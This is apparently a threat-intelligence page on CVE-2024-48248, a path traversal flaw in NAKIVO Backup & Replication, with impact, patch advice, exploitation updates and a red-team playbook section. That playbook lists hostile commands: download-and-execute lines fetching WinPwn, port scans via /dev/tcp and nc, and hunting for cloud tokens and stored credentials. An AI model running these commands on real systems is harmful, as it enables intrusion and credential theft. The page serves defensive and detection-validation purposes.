CVE-2024-48248
Overview
This vulnerability is an absolute path traversal flaw in the NAKIVO Backup & Replication Director component. The root cause lies in insufficient validation of user-supplied input in the getImageByPath method, which processes file path parameters without proper sanitization. The affected feature is the POST /c/router endpoint, which exposes file system paths to unauthorized access.
Vulnerability Description
NAKIVO Backup & Replication before 11.0.0.88174 allows absolute path traversal for reading files via getImageByPath to /c/router (this may lead to remote code execution across the enterprise because PhysicalDiscovery has cleartext credentials).
Impact
An unauthenticated attacker can exploit this flaw to read arbitrary files on the backup server, including sensitive configuration files containing cleartext credentials. This exposure can facilitate remote code execution and lateral movement within the enterprise environment. No user interaction or authentication is required to exploit this vulnerability, increasing the risk of widespread compromise and data breach across virtualized and physical infrastructure protected by the affected product.
Solution
Upgrade NAKIVO Backup & Replication Director to version 11.0.0.88174 or later, as specified in the vendor's release notes at https://helpcenter.nakivo.com/Release-Notes/Content/Release-Notes.htm. The vendor has addressed the path traversal issue in this release. Administrators should consult the official release documentation for detailed patching instructions and verify the deployment of the fixed version to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in NAKIVO Backup & Replication prior to version 11.0.0.88174 is characterized by an absolute path traversal flaw that allows unauthorized access to files on the server. This issue arises from improper input validation in the `getImageByPath` function, which permits attackers to manipulate file paths and potentially access sensitive files stored on the server. By exploiting this vulnerability, an attacker can read arbitrary files, including configuration files that may contain cleartext credentials. The implications of this flaw are severe, as it can facilitate further attacks, including remote code execution, thereby compromising the integrity and confidentiality of the entire enterprise environment.
Attack vectors for this vulnerability are particularly concerning due to the ease of exploitation. An attacker could leverage a simple HTTP request to the affected endpoint, manipulating the file path parameter to traverse directories and access sensitive files. For instance, by crafting a request that includes directory traversal sequences (e.g., `../../`), an attacker can navigate the file system and retrieve files that should be restricted. Once access is gained to files containing cleartext credentials, the attacker could utilize these credentials to gain unauthorized access to other systems within the network, leading to a broader compromise. This scenario highlights the potential for a single vulnerability to serve as a gateway for extensive exploitation across an organization.
The real-world impact of this vulnerability is significant, particularly for organizations relying on NAKIVO Backup & Replication for their data protection strategies. The risk extends beyond mere data exposure; the ability to execute arbitrary code remotely can lead to full system compromise. This could result in data loss, financial repercussions, and reputational damage. Organizations may face regulatory scrutiny if sensitive data is exposed due to inadequate security measures. The potential for attackers to leverage this vulnerability to pivot to other systems within the network further amplifies the business risk, making it imperative for organizations to address this issue promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in their systems, including this specific flaw. Monitoring network traffic for unusual patterns or unauthorized access attempts can also provide early warning signs of exploitation. Additionally, organizations should ensure that they are running the latest version of NAKIVO Backup & Replication, as updates often include critical security patches that address known vulnerabilities. Implementing strict access controls and employing the principle of least privilege can further reduce the attack surface, limiting the potential impact of any exploitation attempts.
In conclusion, the path traversal vulnerability in NAKIVO Backup & Replication presents a serious threat to organizations that utilize this software for backup and data protection. The ease of exploitation, coupled with the potential for remote code execution, underscores the need for immediate attention. By adopting proactive security measures, organizations can mitigate the risks associated with this vulnerability and protect their critical data assets from unauthorized access and exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the path traversal vulnerability in NAKIVO Backup & Replication Director. Although the overall EPSS score remains high but stable, our telemetry indicates the emergence of at least one new exploitation instance, signaling that adversaries are actively probing or leveraging this flaw. This development is significant because it confirms the vulnerability’s transition from theoretical risk to practical exploitation, increasing the likelihood of unauthorized access to sensitive backup files and potential remote code execution within affected environments. While no ransomware campaigns have yet been linked to this vulnerability, the presence of cleartext credentials in the PhysicalDiscovery component elevates the threat’s severity, as attackers could pivot to broader enterprise compromise. Consequently, the threat level should be considered elevated, with defenders needing heightened vigilance for indicators of compromise related to this vulnerability.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-48248, with telemetry indicating a doubling in exploitation attempts targeting the absolute path traversal vulnerability in NAKIVO Backup & Replication Director. This uptick is accompanied by a slight increase in the EPSS score, reflecting growing confidence in the exploitability of this flaw. Although no ransomware campaigns have been definitively linked to this vulnerability, the increased detection frequency underscores a shift from opportunistic scanning toward more targeted exploitation efforts. The presence of cleartext credentials within the PhysicalDiscovery component continues to amplify the risk, as successful exploitation could enable attackers to execute remote code and move laterally within enterprise environments. Consequently, the threat level for CVE-2024-48248 should be considered elevated, with defenders advised to maintain heightened awareness for related indicators of compromise given the evolving exploitation landscape.
Update 3 — July 06, 2026
CSURFACE threat intelligence has identified a slight increase in activity linked to CVE-2024-48248, reflected in a modest uptick in telemetry detections and a marginal rise in the EPSS score. This subtle escalation suggests adversaries are incrementally intensifying their efforts to exploit the absolute path traversal vulnerability within NAKIVO Backup & Replication Director. Although no new proof-of-concept exploits have surfaced, the persistence of cleartext credentials in the PhysicalDiscovery component continues to present a critical attack vector, potentially enabling remote code execution and lateral movement within compromised environments. The incremental rise in exploitation attempts signals a gradual shift from opportunistic scanning toward more deliberate targeting, underscoring the need for defenders to remain vigilant. Consequently, the threat level for CVE-2024-48248 remains high, with a slight elevation in risk due to the evolving exploitation dynamics observed in our telemetry.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nakivo | Backup \& Replication Director | All |
cpe:2.3:a:nakivo:backup_\&_replication_director:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/nakivo-arbitrary-file-read-poc-CVE-2024-48248
|
watchtowrlabs | 3 | 0 | 2025-01-28 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-597 | Absolute Path Traversal |
36%
|
— | — |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-48248 |
| labs.watchtowr.com |
GitHub CVE
|
https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/ |
| helpcenter.nakivo.com |
GitHub CVE
|
https://helpcenter.nakivo.com/Release-Notes/Content/Release-Notes.htm |
| github.com |
NVD API
Exploit
Third Party Advisory
|
https://github.com/watchtowrlabs/nakivo-arbitrary-file-read-poc-CVE-2024-48248/?ref=labs.watchtowr.com |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-48248 |